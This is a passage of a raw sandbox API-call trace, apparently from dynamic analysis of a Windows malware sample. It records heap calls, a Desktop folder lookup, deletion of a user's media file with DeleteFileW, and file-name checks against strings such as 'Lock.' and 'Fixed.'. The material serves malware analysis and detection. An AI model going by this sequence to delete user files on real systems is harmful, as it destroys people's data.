hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75330 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.298] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0087.298] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0087.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.299] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0087.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6450 [0087.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0087.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a756f0 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6450 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5a) returned 0x2a68440 [0087.299] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/63ZOACO2R_kPqlEG.m4a", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\63ZOACO2R_kPqlEG.m4a", lpFilePart=0x8cedf4*="63ZOACO2R_kPqlEG.m4a") returned 0x2c [0087.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0087.300] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\63ZOACO2R_kPqlEG.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\63zoaco2r_kpqleg.m4a")) returned 0x20 [0087.300] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\63ZOACO2R_kPqlEG.m4a", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 0x9a3c00 [0087.300] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\63ZOACO2R_kPqlEG.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\63zoaco2r_kpqleg.m4a")) returned 1 [0087.388] FindNextFileW (in: hFindFile=0x9a3c00, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 0 [0087.389] FindClose (in: hFindFile=0x9a3c00 | out: hFindFile=0x9a3c00) returned 1 [0087.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a756f0 | out: hHeap=0x2af0000) returned 1 [0087.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0087.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0087.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0087.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0087.389] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0087.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0087.389] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0087.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0087.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0087.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0087.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.390] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6530 [0087.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0087.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0087.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0087.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0087.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a756f0 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6530 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0087.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0087.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0087.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0087.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0087.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5a) returned 0x2a68440 [0087.391] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/63ZOACO2R_kPqlEG.m4a", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\63ZOACO2R_kPqlEG.m4a", lpFilePart=0x8cf650*="63ZOACO2R_kPqlEG.m4a") returned 0x2c [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0087.391] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\63ZOACO2R_kPqlEG.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\63zoaco2r_kpqleg.m4a")) returned 0xffffffff [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a756f0 | out: hHeap=0x2af0000) returned 1 [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0087.391] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0087.391] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.391] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0087.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0087.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0087.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6yMUE.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0087.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yMUE.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0087.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUE.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0087.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UE.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0087.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0087.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0087.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0087.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0087.392] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0087.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0087.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6yMUE.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0087.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yMUE.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0087.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUE.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0087.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UE.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0087.393] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0087.393] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, 